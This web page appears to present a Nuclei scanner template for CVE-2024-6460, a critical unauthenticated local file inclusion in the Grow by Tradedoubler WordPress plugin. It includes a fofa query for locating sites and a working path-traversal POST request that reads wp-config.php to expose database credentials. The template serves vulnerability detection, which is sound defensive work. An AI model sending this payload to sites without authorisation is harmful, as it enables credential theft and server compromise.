Skip to content

WordPress Grow by Tradedoubler Plugin < 2.0.22 - Unauthenticated Local File Inclusion

ID: CVE-2024-6460

Severity: critical

Author: ritikchaddha

Tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,tradedoubler-affiliate-tracker

The Grow by Tradedoubler WordPress plugin through version 2.0.21 is vulnerable to Local File Inclusion via the component parameter. This makes it possible for attackers to include and execute PHP files on the server, allowing the execution of any PHP code in those files.

id: CVE-2024-6460
info:
name: WordPress Grow by Tradedoubler Plugin < 2.0.22 - Unauthenticated Local File Inclusion
author: ritikchaddha
severity: critical
description: |
The Grow by Tradedoubler WordPress plugin through version 2.0.21 is vulnerable to Local File Inclusion via the component parameter. This makes it possible for attackers to include and execute PHP files on the server, allowing the execution of any PHP code in those files.
reference:
- https://wpscan.com/vulnerability/ba2f53e0-30be-4f37-91bc-5fa151f1eee7
- https://nvd.nist.gov/vuln/detail/CVE-2024-6460
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-6460
cwe-id: CWE-22
metadata:
max-request: 2
vendor: WordPress
product: tradedoubler-affiliate-tracker
fofa-query: body="wp-content/plugins/tradedoubler-affiliate-tracker/"
tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,tradedoubler-affiliate-tracker
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: word
part: body
words:
- "tradedoubler-affiliate-tracker"
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=tm_load_data&component=../../../../wp-config.php
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200
# digest: 4b0a004830460221009e7e8a800b8b851e2a551c86c6b7685a0c4e82ee9dad6682b040f614b43942e0022100e2f5eaa20da42765b49bf0922bd257aac84def1eb20020fbc4013fbd169b30f1:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-6460.yaml"

View on Github